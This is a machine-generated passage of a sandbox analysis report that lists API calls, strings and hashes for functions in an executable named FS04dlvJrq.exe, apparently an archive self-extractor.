                                                                                                • Part of subcall function 00E7EBD3: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00E7ECB8
                                                                                                • Part of subcall function 00E7EBD3: GlobalUnlock.KERNEL32(00000000), ref: 00E7ECD7
                                                                                                • Part of subcall function 00E7EBD3: GlobalFree.KERNEL32(00000000), ref: 00E7ECDE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                              • String ID: ]
                                                                                              • API String ID: 1797374341-3352871620
                                                                                              • Opcode ID: 1620ca70960798af8f72b16e75ba80f1be90f34ac002a52fbc43e4d1e02bb119
                                                                                              • Instruction ID: 4f8cc7ceb9f6bb73c8a24fa69bae438a7d13e1565a0dc7311d6549e7107cf881
                                                                                              • Opcode Fuzzy Hash: 1620ca70960798af8f72b16e75ba80f1be90f34ac002a52fbc43e4d1e02bb119
                                                                                              • Instruction Fuzzy Hash: 4001C032944205ABD72277A49C0AAAF3ABAAFC4B55F051165F908B7391DB718C0D87E0
                                                                                              APIs
                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00E8ECE0,00000000,?,00E8EC80,00000000,00EA6F40,0000000C,00E8EDD7,00000000,00000002), ref: 00E8ED4F
                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00E8ED62
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00E8ECE0,00000000,?,00E8EC80,00000000,00EA6F40,0000000C,00E8EDD7,00000000,00000002), ref: 00E8ED85
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                              • API String ID: 4061214504-1276376045
                                                                                              • Opcode ID: b6458719985ba20740de6bf070417336a0a41696bea884c9012dfb69db7f86dd
                                                                                              • Instruction ID: 91758d7d42ccd86561ec30ffd7b98b9be09a89de200affd6cacb39fd7a45b08d
                                                                                              • Opcode Fuzzy Hash: b6458719985ba20740de6bf070417336a0a41696bea884c9012dfb69db7f86dd
                                                                                              • Instruction Fuzzy Hash: F0F06D30900618FFCB00ABB1DC09BADBBA5EB48715F50006AE809B22A0CA304948CB90
                                                                                              APIs
                                                                                              • SleepConditionVariableCS.KERNELBASE(?,00E862BB,00000064), ref: 00E86341
                                                                                              • LeaveCriticalSection.KERNEL32(00EB60E0,?,?,00E862BB,00000064,?,?,?,?,00000000,00E9A75D,000000FF), ref: 00E8634B
                                                                                              • WaitForSingleObjectEx.KERNEL32(00000064,00000000,?,00E862BB,00000064,?,?,?,?,00000000,00E9A75D,000000FF), ref: 00E8635C
                                                                                              • EnterCriticalSection.KERNEL32(00EB60E0,?,00E862BB,00000064,?,?,?,?,00000000,00E9A75D,000000FF), ref: 00E86363
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                                              • String ID: `
                                                                                              • API String ID: 3269011525-609909085
                                                                                              • Opcode ID: e30de6254c7e1fe2b631c742e15f27c48370cce9c6b9bf057f5bed7c6e95ac71
                                                                                              • Instruction ID: 5d5849cc260fc3d9f8058a8313679f4a14c9d9ee10e11750e570f5f91279321a
                                                                                              • Opcode Fuzzy Hash: e30de6254c7e1fe2b631c742e15f27c48370cce9c6b9bf057f5bed7c6e95ac71
                                                                                              • Instruction Fuzzy Hash: E1E01231941234EFC7213B97FC09BDE7F28EB44B91F145127F90AB6170C66559149BD4
                                                                                              APIs
                                                                                                • Part of subcall function 00E76C5E: __EH_prolog3_GS.LIBCMT ref: 00E76C65
                                                                                                • Part of subcall function 00E76C5E: GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00E76C9A
                                                                                              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00E750B3
                                                                                              • GetProcAddress.KERNEL32(00EB51F8,CryptUnprotectMemory), ref: 00E750C3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$DirectoryH_prolog3_System
                                                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                              • API String ID: 270589589-1753850145
APIs
Similarity
• API ID: AdjustPointer$_abort
• String ID:
• API String ID: 2252061734-0
APIs
• __EH_prolog3_GS.LIBCMT ref: 00E6F3C5
• CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,00000050,00E6B749,?,?,?,?,?,?), ref: 00E6F450
• CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?), ref: 00E6F4A7
• SetFileTime.KERNEL32(?,?,?,?), ref: 00E6F569
• CloseHandle.KERNEL32(?), ref: 00E6F570
Similarity
• API ID: File$Create$CloseH_prolog3_HandleTime
• String ID:
• API String ID: 4002707884-0
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 00E92BE9
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E92C0C
  • Part of subcall function 00E9040E: RtlAllocateHeap.NTDLL(00000000,00E8535E,?,?,00E86C16,?,?,?,?,?,00E85269,00E8535E,?,?,?,?), ref: 00E90440
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00E92C32
• _free.LIBCMT ref: 00E92C45
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00E92C54
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
APIs
• GetLastError.KERNEL32(00E8535E,00E8535E,?,00E901D8,00E90451,?,?,00E86C16,?,?,?,?,?,00E85269,00E8535E,?), ref: 00E9008E
• _free.LIBCMT ref: 00E900C3
• _free.LIBCMT ref: 00E900EA
• SetLastError.KERNEL32(00000000,?,00E8535E), ref: 00E900F7
• SetLastError.KERNEL32(00000000,?,00E8535E), ref: 00E90100
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
APIs
• _free.LIBCMT ref: 00E934C7
  • Part of subcall function 00E903D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00E93546,?,00000000,?,00000000,?,00E9356D,?,00000007,?,?,00E9396A,?), ref: 00E903EA
  • Part of subcall function 00E903D4: GetLastError.KERNEL32(?,?,00E93546,?,00000000,?,00000000,?,00E9356D,?,00000007,?,?,00E9396A,?,?), ref: 00E903FC
• _free.LIBCMT ref: 00E934D9
• _free.LIBCMT ref: 00E934EB
• _free.LIBCMT ref: 00E934FD
• _free.LIBCMT ref: 00E9350F
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
• _free.LIBCMT ref: 00E8F7DE
  • Part of subcall function 00E903D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00E93546,?,00000000,?,00000000,?,00E9356D,?,00000007,?,?,00E9396A,?), ref: 00E903EA
  • Part of subcall function 00E903D4: GetLastError.KERNEL32(?,?,00E93546,?,00000000,?,00000000,?,00E9356D,?,00000007,?,?,00E9396A,?,?), ref: 00E903FC
• _free.LIBCMT ref: 00E8F7F0
• _free.LIBCMT ref: 00E8F803
• _free.LIBCMT ref: 00E8F814
• _free.LIBCMT ref: 00E8F825
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
  • Part of subcall function 00E71309: __EH_prolog3.LIBCMT ref: 00E71310
  • Part of subcall function 00E71309: GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,00E717FB,?,?,\\?\,522FB702,?,?,?,00000000,00E9A279,000000FF), ref: 00E71319
  • Part of subcall function 00E71AD1: __EH_prolog3_GS.LIBCMT ref: 00E71AD8
  • Part of subcall function 00E6F763: __EH_prolog3_GS.LIBCMT ref: 00E6F76A
  • Part of subcall function 00E6F58B: __EH_prolog3_GS.LIBCMT ref: 00E6F592
  • Part of subcall function 00E6F58B: SetFileAttributesW.KERNELBASE(?,?,00000024,00E6A724,?,?,?,00000011,?,?,00000000,?,?,?,?,?), ref: 00E6F5A8
  • Part of subcall function 00E6F58B: SetFileAttributesW.KERNEL32(?,?,?,?,?,00E6D303,?,?,?,?,?,?,?,522FB702,00000049), ref: 00E6F5EB
• SHFileOperationW.SHELL32(?,00000000,?,?,?,00000000), ref: 00E82137
• MoveFileW.KERNEL32(?,?), ref: 00E822BE
• MoveFileExW.KERNEL32(?,00000000,00000004), ref: 00E822D8
  • Part of subcall function 00E714CC: __EH_prolog3_GS.LIBCMT ref: 00E714D3
Strings
Similarity
• API ID: File$H_prolog3_$AttributesMove$CurrentDirectoryH_prolog3Operation
• String ID: .tmp
• API String ID: 1688541384-2986845003
APIs
  • Part of subcall function 00E7EBAA: GetDC.USER32(00000000), ref: 00E7EBAE
  • Part of subcall function 00E7EBAA: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E7EBB9
  • Part of subcall function 00E7EBAA: ReleaseDC.USER32(00000000,00000000), ref: 00E7EBC4
• GetObjectW.GDI32(?,00000018,?), ref: 00E7EF65
  • Part of subcall function 00E7F1EC: GetDC.USER32(00000000), ref: 00E7F1F5
  • Part of subcall function 00E7F1EC: GetObjectW.GDI32(?,00000018,?), ref: 00E7F224
  • Part of subcall function 00E7F1EC: ReleaseDC.USER32(00000000,?), ref: 00E7F2BC
Strings
                                                                                              Similarity
                                                                                              • API ID: ObjectRelease$CapsDevice
                                                                                              • String ID: ($kJ
                                                                                              • API String ID: 1061551593-2474376059
                                                                                              • Opcode ID: d337e138ea4c317f5a21e3de9f3e2398b7c7e08f326758263c7a5fe0758236a2
                                                                                              • Instruction ID: 7f070719012c1a2c5dbf88ba4374ee6faa8257c30a487dc884065fcf66d8fa92
                                                                                              • Opcode Fuzzy Hash: d337e138ea4c317f5a21e3de9f3e2398b7c7e08f326758263c7a5fe0758236a2
                                                                                              • Instruction Fuzzy Hash: B69112716087109FC710DF66C844A6BBBE9FFC9B00F50495EF58AE7260CB30A905CB62
                                                                                              APIs
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\FS04dlvJrq.exe,00000104), ref: 00E8EE6A
                                                                                              • _free.LIBCMT ref: 00E8EF35
                                                                                              • _free.LIBCMT ref: 00E8EF3F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$FileModuleName
                                                                                              • String ID: C:\Users\user\Desktop\FS04dlvJrq.exe
                                                                                              • API String ID: 2506810119-2498539883
                                                                                              • Opcode ID: 0957d3844ed9145df00ee73f30aaa291800e5955b5685173560e03ec87fa133d
                                                                                              • Instruction ID: 3401e9c0a477fa69fe9a65d06de0821ba54e94c2378de5ca41d8d1769c0efd6c
                                                                                              • Opcode Fuzzy Hash: 0957d3844ed9145df00ee73f30aaa291800e5955b5685173560e03ec87fa133d
                                                                                              • Instruction Fuzzy Hash: F9317C71A04258AFCB21EB9A9C8199EBBFCEB85314F1450ABF90CB7311D7709E44DB90
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3_wcslen
                                                                                              • String ID: VL$`L
                                                                                              • API String ID: 3746244732-1947195591
                                                                                              • Opcode ID: 39b15aed47031253fa10b47129da2998f7a6dc89a7960a05058acacdadb3cf50
                                                                                              • Instruction ID: 70fa9e91a354fa0f49b605ca25fa270683cb913fa7f81dec76575dc10f71e702
                                                                                              • Opcode Fuzzy Hash: 39b15aed47031253fa10b47129da2998f7a6dc89a7960a05058acacdadb3cf50
                                                                                              • Instruction Fuzzy Hash: D1415A71A00109AFDF04EFA8DD899EE77B9FF09344B145119F859BB2A1DB70AD04CB64
                                                                                              APIs
                                                                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00E89E7B
                                                                                              • _abort.LIBCMT ref: 00E89F86
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: EncodePointer_abort
                                                                                              • String ID: MOC$RCC
                                                                                              • API String ID: 948111806-2084237596
                                                                                              • Opcode ID: 27b9d089bcbe6ae7f5b42efaeda618e834a9ccd3e206f2ba82e4b3ca90390f1b
                                                                                              • Instruction ID: 756dc7061f90d79e72a67d11af64540c44b5021d5bce52239b7c866e608e16bd
                                                                                              • Opcode Fuzzy Hash: 27b9d089bcbe6ae7f5b42efaeda618e834a9ccd3e206f2ba82e4b3ca90390f1b
                                                                                              • Instruction Fuzzy Hash: 3F413A71E00209AFCF16EF94CD81ABEBBB5BF48308F185159FA0DB6262D335A950DB50
                                                                                              APIs
                                                                                              • __fprintf_l.LIBCMT ref: 00E7340E
                                                                                              • _strncpy.LIBCMT ref: 00E73459
                                                                                                • Part of subcall function 00E789ED: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000050,?,00000000,00000000,00EAE088,?,00000007,00E733E2,?,?,00000050,522FB702), ref: 00E78A0A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                              • String ID: $%s$@%s
                                                                                              • API String ID: 562999700-834177443
                                                                                              • Opcode ID: 00f52f03dafc5476a8edeb5d268dfc4ab6b4257b40e0dc913485543afce648a2
                                                                                              • Instruction ID: 22dc8f908b3dc92c301e3f18d28ffdf6fa5b88708ebb4515752ec6eed6387470
                                                                                              • Opcode Fuzzy Hash: 00f52f03dafc5476a8edeb5d268dfc4ab6b4257b40e0dc913485543afce648a2
                                                                                              • Instruction Fuzzy Hash: 0021817250070DABDB14DE78CC45EAE7BE8BB04300F145516FA28E7291E731EA15DB61
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E7F8F7
                                                                                                • Part of subcall function 00E61E44: GetDlgItem.USER32(00000000,00003021), ref: 00E61E88
                                                                                                • Part of subcall function 00E61E44: SetWindowTextW.USER32(00000000,00E9C6C8), ref: 00E61E9E
                                                                                              • EndDialog.USER32(?,00000001), ref: 00E7F99F
                                                                                              • SetDlgItemTextW.USER32(?,00000066,00000000), ref: 00E7F9E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemText$DialogH_prolog3_Window
                                                                                              • String ID: ASKNEXTVOL
                                                                                              • API String ID: 2321058237-3402441367
                                                                                              • Opcode ID: fb1657171ba4c87966f6e3050047d1165c8413d98a6bf6dd89c624d5d256de46
                                                                                              • Instruction ID: 1ec6ad553c2d8b4674827532bc43e10ba5ccf3dbd7963291a104220e490b7cf5
                                                                                              • Opcode Fuzzy Hash: fb1657171ba4c87966f6e3050047d1165c8413d98a6bf6dd89c624d5d256de46
                                                                                              • Instruction Fuzzy Hash: FE218232640105BFDB15EFA4DC56FAE37A8AF8A344F04A065F649BB2A5C731D905CB22
                                                                                              APIs
                                                                                                • Part of subcall function 00E7FEA7: GetCurrentProcess.KERNEL32(00020008,?), ref: 00E7FEB6
                                                                                                • Part of subcall function 00E7FEA7: GetLastError.KERNEL32 ref: 00E7FEE1
                                                                                              • CreateDirectoryW.KERNEL32(?,?), ref: 00E7FB23
                                                                                              • LocalFree.KERNEL32(?), ref: 00E7FB31
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
                                                                                              • String ID: .L$tL
                                                                                              • API String ID: 1077098981-2777569843
                                                                                              • Opcode ID: f9316cd9be40c71e79a6f11220effe5f8d7e967f9ba11622bc57ea294b5e41c8
                                                                                              • Instruction ID: a19d1b9f1ec336b585f269ef396e530a19934a02294a27817f3504663571af44
                                                                                              • Opcode Fuzzy Hash: f9316cd9be40c71e79a6f11220effe5f8d7e967f9ba11622bc57ea294b5e41c8
                                                                                              • Instruction Fuzzy Hash: 5621C6B59002099FDB10DFA6D8849EEBBF8FF49354F10852AE819E7110D734DA19CBA1
                                                                                              APIs
                                                                                              • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00E6FEBD,00000008,00000004,00E72D42,?,?,?,?,00000000,00E7ABB6,?), ref: 00E77484
                                                                                              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00E6FEBD,00000008,00000004,00E72D42,?,?,?,?,00000000), ref: 00E7748E
                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00E6FEBD,00000008,00000004,00E72D42,?,?,?,?,00000000), ref: 00E7749E
                                                                                              Strings
                                                                                              • Thread pool initialization failed., xrefs: 00E774B6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                              • String ID: Thread pool initialization failed.
                                                                                              • API String ID: 3340455307-2182114853
                                                                                              • Opcode ID: f81f17465de770df2dada66f9dcefa7ecebb418b4e3949f7886552cfbd24cfe3
                                                                                              • Instruction ID: 0bfdff9c4f4e0857e53120d76acb3c3fe4810be3ec900044af733b5ab30c4520
                                                                                              • Opcode Fuzzy Hash: f81f17465de770df2dada66f9dcefa7ecebb418b4e3949f7886552cfbd24cfe3
                                                                                              • Instruction Fuzzy Hash: 6711A7B1648705AFC3215F769CC59A7FFECEB59748F10582EF1EDD2200E67059848B50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                              • API String ID: 0-56093855
                                                                                              • Opcode ID: 5b94e8b6a842913fd3ad60f4296f8aabc2c9d503f687e5387cbf0be216ccc51c
                                                                                              • Instruction ID: bfdef2ed868b39dc1d014c6d55146596fa42edd98ed6765bc545e8ddea07c140
                                                                                              • Opcode Fuzzy Hash: 5b94e8b6a842913fd3ad60f4296f8aabc2c9d503f687e5387cbf0be216ccc51c
                                                                                              • Instruction Fuzzy Hash: 3E1170B1305301AFD715EF2AED48A177BE8E749385B04152AF64DF33A0D2719848DB62
                                                                                              APIs
                                                                                                • Part of subcall function 00E73EAA: _swprintf.LIBCMT ref: 00E73EEA
                                                                                                • Part of subcall function 00E73EAA: _strlen.LIBCMT ref: 00E73F0B
                                                                                                • Part of subcall function 00E73EAA: SetDlgItemTextW.USER32(?,00EA919C,?), ref: 00E73F64
                                                                                                • Part of subcall function 00E73EAA: GetWindowRect.USER32(?,?), ref: 00E73F9A
                                                                                                • Part of subcall function 00E73EAA: GetClientRect.USER32(?,?), ref: 00E73FA6
                                                                                              • GetDlgItem.USER32(00000000,00003021), ref: 00E61E88
                                                                                              • SetWindowTextW.USER32(00000000,00E9C6C8), ref: 00E61E9E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                              • String ID: 0$gI
                                                                                              • API String ID: 2622349952-269445949
                                                                                              • Opcode ID: 7bf5dc2af928c1d01f709ffdecfdace228e5cc3b352e1872b280881dcdc89ff2
